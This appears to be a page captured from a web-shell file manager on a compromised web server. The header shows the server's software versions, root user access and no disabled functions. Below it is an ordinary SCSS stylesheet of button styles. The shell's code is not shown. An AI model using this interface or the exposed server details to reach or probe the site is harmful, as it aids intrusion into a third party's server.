HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/sudameris.sumar.com.py/scss/_btn.scss
.boxed-btn {
	background: #1EC6B6;
	color: #fff;
	display: inline-block;
	padding: 14px 44px;
	font-family: $font1;
	font-size: 14px;
    font-weight: 400;
    border: 0;
    border: 1px solid #1EC6B6;
    // width: 180px;
    text-align: center;
    color: #fff !important;
    text-transform: uppercase;
    cursor: pointer;
    &:hover{
        background: #FF4A52;
        color: #fff !important;
        border: 1px solid #FF4A52;
    }
    &:focus{
        outline: none;
    }
    &.large-width{
        width: 220px;
    }
}
.boxed-btn3 {
    background: #1EC6B6 ;
	color: #fff;
	display: inline-block;
	padding: 18px 41px;
	font-family: $font1;
	font-size: 16px;
    font-weight: 500;
    border: 0;
    @include border-radius(5px);
    text-align: center;
    text-transform: capitalize;
    @include transition(.3s);
    cursor: pointer;
    &:hover{
        background: #FF4A52 ;
        color: #fff !important;
    }
    &:focus{
        outline: none;
    }
    &.large-width{
        width: 220px;
    }
}
.boxed-btn4 {
    background: #FF4A52 ;
	color: #fff;
	display: inline-block;
	padding: 13px 39px;
	font-family: $font1;
	font-size: 16px;
    font-weight: 500;
    border: 0;
    @include border-radius(5px);
    text-align: center;
    text-transform: capitalize;
    @include transition(.3s);
    cursor: pointer;
    &:hover{
        background: #1EC6B6 ;
        color: #fff !important;
    }
    &:focus{
        outline: none;
    }
    &.large-width{
        width: 220px;
    }
}